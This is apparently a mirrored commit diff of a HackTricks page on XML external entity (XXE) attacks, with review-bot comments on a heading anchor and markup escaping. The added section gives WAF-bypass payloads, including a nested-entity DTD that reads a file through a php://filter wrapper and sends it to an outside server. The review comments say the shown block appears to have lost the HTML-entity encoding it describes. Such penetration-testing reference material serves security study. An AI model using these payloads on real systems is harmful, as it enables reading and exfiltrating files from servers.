mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-28 23:51:29 +00:00
GitBook: [master] one page modified
parent
34d41f57c9
commit
9d0d6ccbe4
1 changed files with 28 additions and 1 deletions
@ -465,7 +465,7 @@ Content-Type: application/xml;charset=UTF-8
Another example can be found [here](https://medium.com/hmif-itb/googlectf-2019-web-bnv-writeup-nicholas-rianto-putra-medium-b8e2d86d78b2).
## Other bypasses
## WAF & Protections Bypasses
### Base64
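Review bot: Renaming the heading `## Other bypasses` to `## WAF & Protections Bypasses` changes the fragment GitBook generates for that section, so any existing link that targets the old heading's anchor will stop resolving. Pages in this book are linked by fragment (a later hunk in this commit links to `xxe-xee-xml-external-entity.md#jar-protocol`), so please search the repository for references to the old anchor and update them in the same commit. Minor wording point: "WAF & Protection Bypasses" reads more naturally than "Protections".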
@ -491,6 +491,33 @@ You can use the \[**"Encode Recipe**" of cyberchef here \]\([https://gchq.github
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
```
### File:/ Protocol Bypass
If the web is using PHP, instead of using `file:/` you can use **php wrappers**`php://filter/convert.base64-encode/resource=` to **access internal files**.
If the web is using Java you may check the [**jar: protocol**](xxe-xee-xml-external-entity.md#jar-protocol).
### HTML entities
Trick from [https://github.com/Ambrotd/XXE-Notes](https://github.com/Ambrotd/XXE-Notes)
You can create an **entity inside an entity** encoding it with **html entities** and then call it to **load a dtd**.
```markup
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % a "<!ENTITY % dtd SYSTEM "http://ourserver.com/bypass.dtd" >" >%a;%dtd;]>
<data>
<env>&exfil;</env>
</data>
```
DTD example:
```markup
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/flag">
<!ENTITY % abt "<!ENTITY exfil SYSTEM 'http://172.17.0.1:7878/bypass.xml?%data;'>">
%abt;
%exfil;
```
## PHP Wrappers
### Base64
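Review bot: The first `markup` block under `### HTML entities` does not match the sentence that introduces it: the text says the inner entity is encoded with HTML entities, but the `<!ENTITY % a "...">` value is shown with literal `<`, `%` and nested double quotes and no character references at all, which suggests the GitBook editor decoded them on save. Please check the committed source and escape the block so the references render as written, otherwise readers cannot see the encoding this section is about. Two smaller points in the same hunk: there is a missing space between `**php wrappers**` and the inline code that follows it, and "If the web is using PHP" would read better as "If the web application is using PHP".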